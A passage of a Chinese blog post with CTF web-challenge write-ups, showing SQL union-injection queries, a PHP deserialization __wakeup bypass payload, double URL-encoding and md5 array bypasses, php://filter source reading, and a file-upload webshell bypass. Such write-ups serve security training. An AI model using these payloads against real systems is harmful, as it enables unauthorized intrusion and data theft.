<p>  1’union select 1,2,column_name from information_schema.columns where<br>  table_name=’secret_table’ #查列名<br><img src="https://img-blog.csdnimg.cn/20210112134331364.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
</blockquote>
<blockquote>
<p>  1’union select 1,2,fl4g from secret_table # 查看flag</p>
</blockquote>
<p>9.nannannannan-batman<br><img src="https://img-blog.csdnimg.cn/20210112134346610.png" alt="在这里插入图片描述"></p>
<blockquote>
<p>  给了一个附件，记事本打开一堆乱码，是&lt;script&gt;代码，需要浏览器打开</p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/2021011213440941.png" alt="在这里插入图片描述"></p>
<blockquote>
<p>  什么都没有，返回记事本wp上方法是把eval改为alert以弹窗形式显示完整代码<br><img src="https://img-blog.csdnimg.cn/20210112134420640.png" alt="在这里插入图片描述"></p>
</blockquote>
<blockquote>
<p>  为什么改为alert？：文档中不能显示就是编码的问题，但是虽然编码不一样，这个函数的内容是没有变的，alert的时候直接显示了一个变量内容，也可以理解为以能显示的编码显示出来</p>
</blockquote>
<p>整理：<img src="https://img-blog.csdnimg.cn/20210112134433350.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<blockquote>
<p>  需要满足条件：</p>
</blockquote>
<ol>
<li><p> e.length==16</p>
</li>
<li><p> e.match(/^be0f23/)!=null</p>
</li>
<li><p> e.match(/233ac/)!=null</p>
</li>
<li><p> e.match(/e98aa$/)!=null</p>
</li>
<li><p>e.match(/c7be9/)!=null</p>
<p> 经过：</p>
<p> document.write(s[o%4][0]);s[o%4].splice(0,1)</p>
<p> 出flag</p>
<p> 正则表达式：正则表达式(regular<br> expression)描述了一种字符串匹配的模式（pattern），可以用来检查一个串是否含有某种子串、将匹配的子串替换或者从某个串中取出符合某个条件的子串等。</p>
</li>
</ol>
<p>通过匹配e的值来达到满足if条件；<br><img src="https://img-blog.csdnimg.cn/20210112134506231.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>代码中有^和$则e=be0f233ac7be98aa,输入到框中即可<br><img src="https://img-blog.csdnimg.cn/2021011213451853.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>法二：直接写js代码：</p>
<p>&lt;script&gt;</p>
<p>var t=[“fl”,”s_a”,”i”,”e}”];</p>
<p>var n=[“a”,”_h0l”,”n”];</p>
<p>var r=[“g{“,”e”,”_0”];</p>
<p>var i=[“it’”,”_”,”n”];</p>
<p>var s=[t,n,r,i];</p>
<p>for(var o=0;o&lt;13;++o){</p>
<p>document.write(s[o%4][0]);s[o%4].splice(0,1)}</p>
<p>&lt;/script&gt;</p>
<p>一样的效果，改html后缀直接打开</p>
<p>10.web2（php代码审计+逆向解密）<br><img src="https://img-blog.csdnimg.cn/20210112134537598.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>自定义一个加密函数</p>
<p>Strrev反转字符串</p>
<p>Substr选中每个字符</p>
<p>加密过程：反转 ASC+1 base64 反转 rot13</p>
<p>解密反过来即可，可用php，也可用py</p>
<p>尝试一下php<br><img src="https://img-blog.csdnimg.cn/2021011213455450.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>在线工具解一下</p>
<p>11.PHP2</p>
<blockquote>
<p>  index.phps是index.php的源码<br><img src="https://img-blog.csdnimg.cn/20210112134615858.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
</blockquote>
<p>发现源码可以直接查看，一般是不能直接查看的<br><img src="https://img-blog.csdnimg.cn/20210112134624457.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<blockquote>
<p>  查看网页源代码至此看到所有线索</p>
</blockquote>
<blockquote>
<p>  代码审计：如果admin=GET[id]则exit</p>
</blockquote>
<p>要想拿到key要先经过</p>
<p>$_GET[id] = urldecode($_GET[id]);处理</p>
<p>如果$_GET[id] == “admin”输出key。</p>
<p>*：当传入参数id时，浏览器在后面会对非ASCII码的字符进行一次urlencode<br>，（如果输入%61解码为a，在下一个解码处无法解码，所以应该上传a的两次编码即%2561）然后在这段代码中运行时，会自动进行一次urldecode</p>
<p>12. unserialize3(php反序列化绕过__wakeup())</p>
<p>序列化：序列化<br>(Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间，对象将其当前状态写入到临时或持久性存储区。以后，可以通过从存储区中读取或反序列化对象的状态，重新创建该对象。<br><img src="https://img-blog.csdnimg.cn/20210112134651180.png" alt="在这里插入图片描述"></p>
<p>以code=传参数</p>
<p>在使用 unserialize（）反序列化时 会先调用 __wakeup()函数，</p>
<p>而本题的关键就是如何 绕开 __wakeup()函数，就是在 反序列化的时候不调用它</p>
<p><strong>当 序列化的字符串中的属性值个数 大于 属性个数 就会导致反序列化异常 从而跳过<br>__wakeup()</strong></p>
<p>构造序列化的字符串：</p>
<p>&lt;?php</p>
<p>class xctf{</p>
<p>public $flag = “111”;</p>
<p>}</p>
<p>$s = new xctf();</p>
<p>echo(serialize($s));</p>
<p>?&gt;</p>
<p>在线运行</p>
<p>得到：O:4:”xctf”:1:{s:4:”flag”;s:3:”111”;}</p>
<p>构造pyload：O:4:”xctf”:2:{s:4:”flag”;s:3:”111”;}<br>或O:1:”xctf”:1:{s:4:”flag”;s:3:”111”;} 或 O:4:”xctf”:1:{s:1:”flag”;s:3:”111”;}<br>都可以</p>
<p>在url中输入/?code=</p>
<p>O:4:”xctf”:2:{s:4:”flag”;s:3:”111”;}</p>
<p>13.upload1(文件上传)<br><img src="https://img-blog.csdnimg.cn/20210112134720215.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>先查看了一下源代码，对文件上传的类型进行了限制上传<br>jpg，png类型，记事本写一句话木马，后缀为jpg，绕过前端限制，上传时用bp抓包，修改后缀为php，菜刀连接</p>
<p>14.bugku<br><img src="https://img-blog.csdnimg.cn/20210112134822267.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210112134827684.png" alt="在这里插入图片描述"></p>
<p>php://filter/read/convert.base64-encode/resource=index.php<br>这句话的意思是我们用base64编码的方式来读文件index.php；这时页面会显示出源文件index.php经过base64编码后的内容，然后经过base64解码就可以看到flag</p>
<p>php://filter<br>是一种设计用来允许过滤器程序在打开时成为流的封装协议。这对于单独具有完整功能的文件函数例如<br>readfile()，file() 和 file_get_contents()<br>很有用，否则就没有机会在读取内容之前将过滤器应用于流之上。 该协议语法为<br>php://filter:/&lt;action&gt;=&lt;name&gt; 比如 php://filter:/resource=ht</p>
<p>15.bugku（提示查看备份文件）</p>
<p>输入index.php.bak</p>
<p><img src="https://img-blog.csdnimg.cn/20210112134848365.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>从网址输一个参数，以？开始，？以后的参数返回给$str,将$str中的key字段替换为空，</p>
<p>Parse_str将字符串解析成多个变量,接着md5加密key1，key2；</p>
<p>由于md5无法加密数组所以构造：</p>
<p>?kkeyey1[]=1&amp;kkey2[]=2</p>
<p>或者?kkeyey1=s155964671a&amp;kkeyey2=s1502113478a</p>
<p>16．bugku(sql注入)<br><img src="https://img-blog.csdnimg.cn/20210112134904330.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210112134910341.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>发现是以post方式以id传参</p>
<p><img src="https://img-blog.csdnimg.cn/2021011213492317.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>确定字段数为4，联合注入<br><img src="https://img-blog.csdnimg.cn/20210112134934798.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>出现skctf库，查看表：</p>
<p>id=0’ union select 1,2,3,table_name from information_schema.tables where<br>table_schema=’skctf’ #<br><img src="https://img-blog.csdnimg.cn/20210112134944604.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>出现fl4g表，查看列：</p>
<p>id=0’ union select 1,2,3,column_name from information_schema.columns where<br>table_name=’fl4g’ #<br><img src="https://img-blog.csdnimg.cn/20210112134952545.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>出现列：skctf_flag;查看：</p>
<p>id=0’ union select 1,2,3,skctf_flag from fl4g#<br><img src="https://img-blog.csdnimg.cn/20210112135008888.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item"></div>
      <div class="post-nav-item">
    <a href="/2021/01/17/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87/" rel="next" title="命令执行绕过小技巧">
      命令执行绕过小技巧 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="程勇胜"
      src="/images/cys.jpg">
  <p class="site-author-name" itemprop="name">程勇胜</p>
  <div class="site-description" itemprop="description">花有重开日，人无再少年</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">48</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="mailto:1216043519@qq.com" title="E-Mail → mailto:1216043519@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">程勇胜</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
